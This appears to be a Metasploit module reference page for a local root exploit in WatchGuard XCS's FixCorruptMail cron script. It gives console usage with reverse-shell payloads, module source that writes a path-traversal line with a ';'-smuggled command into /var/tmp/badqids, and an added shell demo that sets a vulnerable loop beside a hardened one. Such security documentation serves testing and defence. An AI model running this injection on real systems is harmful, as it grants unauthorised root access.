Watchguard XCS FixCorruptMail Local Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/freebsd/local/watchguard_fix_corrupt_mail Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Watchguard XCS FixCorruptMail Local Privilege Escalation
Module: exploit/freebsd/local/watchguard_fix_corrupt_mail
Source code: modules/exploits/freebsd/local/watchguard_fix_corrupt_mail.rb
Disclosure date: 2015-06-29
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): x64
Supported platform(s): BSD
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module exploits a vulnerability in the WatchGuard XCS 'FixCorruptMail' script, which is run periodically from root's crontab. The script reads mail queue IDs from /var/tmp/badqids, a file an unprivileged user can create, and passes them to a shell without sanitising them, so a line combining a path traversal with a ';' runs an attacker-supplied command as root. Because the module has to wait for the cron job to fire, escalation can take up to 3 minutes.
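The following is an added example, not code from the Metasploit module or from WatchGuard. It is a hypothetical stand-in for a cron job that reads queue IDs from a file and runs a command on each one, built to show why a badqids line of the form "../../../../../..<dummy>;<payload>" turns into code execution when the id is spliced unquoted into a shell command, and what the same job looks like once the id is validated and never re-parsed by a shell. All paths, the queue directory and the alphanumeric queue-id alphabet are assumptions; everything runs inside a scratch directory.

```shell
#!/bin/sh
# Added example (hypothetical stand-in, not the WatchGuard FixCorruptMail script).
# Demonstrates the injection class the module relies on and a hardened variant.
set -eu

WORK=$(mktemp -d)
QUEUE="$WORK/queue"        # stand-in for the mail queue directory (assumption)
DUMMY="$WORK/dummy"        # the empty "dummy" file the attacker creates
MARKER="$WORK/pwned"       # created only if the injected command actually runs
BADQIDS="$WORK/badqids"    # stand-in for /var/tmp/badqids
mkdir -p "$QUEUE"
: > "$DUMMY"

# Attacker-controlled line: traverse out of the queue dir to a file the
# attacker owns, then use ';' to smuggle a second command after the first.
printf '%s\n' "../../../../../..$DUMMY;touch $MARKER" > "$BADQIDS"

# Vulnerable pattern: the id is interpolated into a string that a shell
# re-parses, so ';' ends the intended command and starts the attacker's.
fix_vulnerable() {
  while IFS= read -r qid; do
    sh -c "ls -l $QUEUE/$qid >/dev/null 2>&1" || true
  done < "$1"
}

# Hardened pattern: accept only bare alphanumeric ids (assumed queue-id
# alphabet) and pass the path as a single quoted argument, so file contents
# can never be interpreted as shell syntax.
fix_hardened() {
  while IFS= read -r qid; do
    case "$qid" in
      ""|*[!A-Za-z0-9]*) printf 'rejected id: %s\n' "$qid" >&2; continue ;;
    esac
    ls -l "$QUEUE/$qid" >/dev/null 2>&1 || true
  done < "$1"
}

# Run the named fixer over the crafted file; return 0 if the injected
# command ran (marker file exists), 1 otherwise.
injection_succeeded() {
  rm -f "$MARKER"
  "$1" "$BADQIDS" 2>/dev/null
  [ -e "$MARKER" ]
}

cleanup() { rm -rf "$WORK"; }

demo() {
  if injection_succeeded fix_vulnerable; then
    echo "vulnerable: injected command ran as the cron job's user"
  fi
  if ! injection_succeeded fix_hardened; then
    echo "hardened: id rejected, injected command did not run"
  fi
}

demo
```

The fix is not the regex alone: the hardened loop also stops routing the value through `sh -c`, which removes the whole class of bug even if a future id format slips past the filter. The other half of the real weakness is that the input file lives in a sticky, world-writable directory, so any local user can feed the root job.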
Module Ranking and Traits
Module Ranking:
- manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g. exploit/windows/smb/psexec).
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.
msf > use exploit/freebsd/local/watchguard_fix_corrupt_mail
msf exploit(watchguard_fix_corrupt_mail) > show targets
... a list of targets ...
msf exploit(watchguard_fix_corrupt_mail) > set TARGET target-id
msf exploit(watchguard_fix_corrupt_mail) > show options
... show and set options ...
msf exploit(watchguard_fix_corrupt_mail) > set SESSION session-id
msf exploit(watchguard_fix_corrupt_mail) > exploit
Required Options
- SESSION: The session to run this module on.
Msfconsole Usage
Here is how the freebsd/local/watchguard_fix_corrupt_mail exploit module looks in the msfconsole:
msf6 > use exploit/freebsd/local/watchguard_fix_corrupt_mail
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show info
Name: Watchguard XCS FixCorruptMail Local Privilege Escalation
Module: exploit/freebsd/local/watchguard_fix_corrupt_mail
Platform: BSD
Arch: x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2015-06-29
Provided by:
Daniel Jensen <daniel.jensen[at]security-assessment.com>
Available targets:
Id Name
-- ----
0 Watchguard XCS 9.2/10.0
Check supported: Yes
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SESSION                   yes       The session to run this module on.
Payload information:
Description:
This module exploits a vulnerability in the Watchguard XCS
'FixCorruptMail' script called by root's crontab which can be
exploited to run a command as root within 3 minutes.
References:
http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf
Module Options
This is a complete list of options available in the freebsd/local/watchguard_fix_corrupt_mail exploit:
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show options
Module options (exploit/freebsd/local/watchguard_fix_corrupt_mail):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SESSION                   yes       The session to run this module on.
Payload options (generic/shell_reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port
Exploit target:
Id Name
-- ----
0 Watchguard XCS 9.2/10.0
Advanced Options
Here is a complete list of advanced options supported by the freebsd/local/watchguard_fix_corrupt_mail exploit. The EXE:: and MSI:: entries are inherited from Metasploit's executable-generation mixins and are mostly meaningful for Windows payloads; the one that matters here is WfsDelay, which this module raises to 180 seconds because it has to wait for root's cron job to run the vulnerable script:
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show advanced
Module advanced options (exploit/freebsd/local/watchguard_fix_corrupt_mail):
Name                    Current Setting  Required  Description
----                    ---------------  --------  -----------
ContextInformationFile                   no        The information file that contains context information
DisablePayloadHandler   false            no        Disable the handler code for the selected payload
EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
EXE::FallBack           false            no        Use the default template in case the specified one is missing
EXE::Inject             false            no        Set to preserve the original EXE function
EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
EXE::Path                                no        The directory in which to look for the executable template
EXE::Template                            no        The executable template file name.
EnableContextEncoding   false            no        Use transient context when encoding payloads
FileDropperDelay                         no        Delay in seconds before attempting cleanup
MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
MSI::Path                                no        The directory in which to look for the msi template
MSI::Template                            no        The msi template file name
MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE                 false            no        Enable detailed status messages
WORKSPACE                                no        Specify the workspace for this module
WfsDelay                180              no        Additional delay in seconds to wait for a session
Payload advanced options (generic/shell_reverse_tcp):
Name                        Current Setting  Required  Description
----                        ---------------  --------  -----------
ARCH                                         no        The architecture that is being targeted
PLATFORM                                     no        The platform that is being targeted
ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
ReverseListenerComm                          no        The specific communication channel to use for this listener
ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
VERBOSE                     false            no        Enable detailed status messages
WORKSPACE                                    no        Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the freebsd/local/watchguard_fix_corrupt_mail module can exploit:
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show targets
Exploit targets:
Id Name
-- ----
0 Watchguard XCS 9.2/10.0
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the freebsd/local/watchguard_fix_corrupt_mail exploit:
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show payloads
Compatible Payloads
===================
#  Name                                       Disclosure Date  Rank    Check  Description
-  ----                                       ---------------  ----    -----  -----------
0  payload/bsd/x64/exec                                        normal  No     BSD x64 Execute Command
1  payload/bsd/x64/shell_bind_ipv6_tcp                         normal  No     BSD x64 Command Shell, Bind TCP Inline (IPv6)
2  payload/bsd/x64/shell_bind_tcp                              normal  No     BSD x64 Shell Bind TCP
3  payload/bsd/x64/shell_bind_tcp_small                        normal  No     BSD x64 Command Shell, Bind TCP Inline
4  payload/bsd/x64/shell_reverse_ipv6_tcp                      normal  No     BSD x64 Command Shell, Reverse TCP Inline (IPv6)
5  payload/bsd/x64/shell_reverse_tcp                           normal  No     BSD x64 Shell Reverse TCP
6  payload/bsd/x64/shell_reverse_tcp_small                     normal  No     BSD x64 Command Shell, Reverse TCP Inline
7  payload/generic/custom                                      normal  No     Custom Payload
8  payload/generic/shell_bind_tcp                              normal  No     Generic Command Shell, Bind TCP Inline
9  payload/generic/shell_reverse_tcp                           normal  No     Generic Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the freebsd/local/watchguard_fix_corrupt_mail exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(freebsd/local/watchguard_fix_corrupt_mail) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
[email protected]
Here is the relevant code snippet. This string is not an error message but the vendor marker the check method expects to find in the output of uname -a; when it is absent the module reports the target as Safe rather than Detected:
def check
  #Basic check to see if the device is a Watchguard XCS
  res = cmd_exec('uname -a')
  return Exploit::CheckCode::Detected if res && res.include?('[email protected]')

  Exploit::CheckCode::Safe
end
Rooting can take up to 3 minutes.
This is a warning, not a failure. The module does not invoke the vulnerable script itself: it uploads the payload, stages the files the script will read, and then waits for root's cron job to run FixCorruptMail, which is why WfsDelay defaults to 180 seconds for this module. Here is the relevant code snippet:
def exploit
  print_warning('Rooting can take up to 3 minutes.')

  #Generate and upload the payload
  filename = upload_payload
  fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
  print_status("Payload #{filename} uploaded.")

  #Sets up empty dummy file needed for privesc
  dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
  cmd_exec("touch #{dummy_filename}")
Payload failed to upload
The same snippet covers this message: upload_payload returned nil, meaning the payload executable could not be written to the target through the session. Confirm that the session is a working shell on the appliance and that the session user can create files there before retrying.
Failed to create badqids file to exploit crontab
Here is the relevant code snippet. The line written to /var/tmp/badqids pairs a path traversal that resolves to the empty dummy file with a ';' so that when the cron script hands the entry to a shell, the uploaded payload runs as root immediately after it. The error is raised when write_file could not create /var/tmp/badqids through the session, for example because a file by that name already exists and is not writable by the session user:
vprint_status('Added dummy file')

#Put the shell injection line into badqids
#setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
#cmd_exec(setup_privesc)

#Cleanup the files we used
register_file_for_cleanup('/var/tmp/badqids')
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #7507 Merged Pull Request: Refactor arch/platform, refactor TLV XOR, add UUID to each packet, fix payload uuid/arch/platform tracking, and update everything to match
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6331 Merged Pull Request: Fix #6330, generate_payload_exe returning nil for generic bind/reverse payloads
References
- http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf
See Also
Check also the following modules related to this module:
- exploit/freebsd/http/watchguard_cmd_exec
- exploit/freebsd/local/intel_sysret_priv_esc
- exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc
- exploit/freebsd/local/mmap
- exploit/freebsd/local/rtld_execl_priv_esc
- auxiliary/dos/windows/smb/ms06_035_mailslot
- exploit/linux/http/mailcleaner_exec
- exploit/osx/email/mailapp_image_exec
- exploit/unix/local/netbsd_mail_local
- exploit/unix/smtp/opensmtpd_mail_from_rce
- exploit/windows/browser/communicrypt_mail_activex
- exploit/windows/http/mailenable_auth_header
- exploit/windows/imap/mailenable_login
- exploit/windows/imap/mailenable_status
- exploit/windows/imap/mailenable_w3c_select
- exploit/windows/misc/eureka_mail_err
- exploit/windows/smtp/mailcarrier_smtp_ehlo
- exploit/linux/local/zimbra_postfix_priv_esc
- exploit/linux/misc/gld_postfix
- exploit/windows/ftp/easyftp_cwd_fixret
- exploit/windows/ftp/easyftp_list_fixret
- exploit/windows/ftp/easyftp_mkd_fixret
- exploit/unix/webapp/cakephp_cache_corruption
- exploit/windows/browser/adobe_shockwave_rcsl_corruption
- exploit/windows/browser/ms08_078_xml_corruption
- exploit/windows/browser/ms09_002_memory_corruption
- auxiliary/gather/ibm_bigfix_sites_packages_enum
- auxiliary/fuzzers/smb/smb2_negotiate_corrupt
- auxiliary/fuzzers/smb/smb_create_pipe_corrupt
- auxiliary/fuzzers/smb/smb_negotiate_corrupt
- auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
- auxiliary/fuzzers/smb/smb_tree_connect_corrupt
- auxiliary/fuzzers/ssh/ssh_kexinit_corrupt
- auxiliary/fuzzers/ssh/ssh_version_corrupt
- auxiliary/fuzzers/tds/tds_login_corrupt
- exploit/bsd/finger/morris_fingerd_bof
- payload/bsd/sparc/shell_bind_tcp
- payload/bsd/sparc/shell_reverse_tcp
- payload/bsd/vax/shell_reverse_tcp
- payload/bsd/x64/exec
- payload/bsd/x64/shell_bind_ipv6_tcp
- payload/bsd/x64/shell_bind_tcp
- payload/bsd/x64/shell_bind_tcp_small
- payload/bsd/x64/shell_reverse_ipv6_tcp
- payload/bsd/x64/shell_reverse_tcp
- payload/bsd/x64/shell_reverse_tcp_small
- payload/bsd/x86/exec
- payload/bsd/x86/metsvc_bind_tcp
- payload/bsd/x86/metsvc_reverse_tcp
- payload/bsd/x86/shell/bind_ipv6_tcp
- payload/bsd/x86/shell/bind_tcp
- payload/bsd/x86/shell_bind_tcp
- payload/bsd/x86/shell_bind_tcp_ipv6
- payload/bsd/x86/shell_find_port
- payload/bsd/x86/shell/find_tag
- payload/bsd/x86/shell_find_tag
- payload/bsd/x86/shell/reverse_ipv6_tcp
- payload/bsd/x86/shell/reverse_tcp
- payload/bsd/x86/shell_reverse_tcp
- payload/bsd/x86/shell_reverse_tcp_ipv6
- post/bsd/gather/hashdump
Authors
- Daniel Jensen <daniel.jensen[at]security-assessment.com>
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.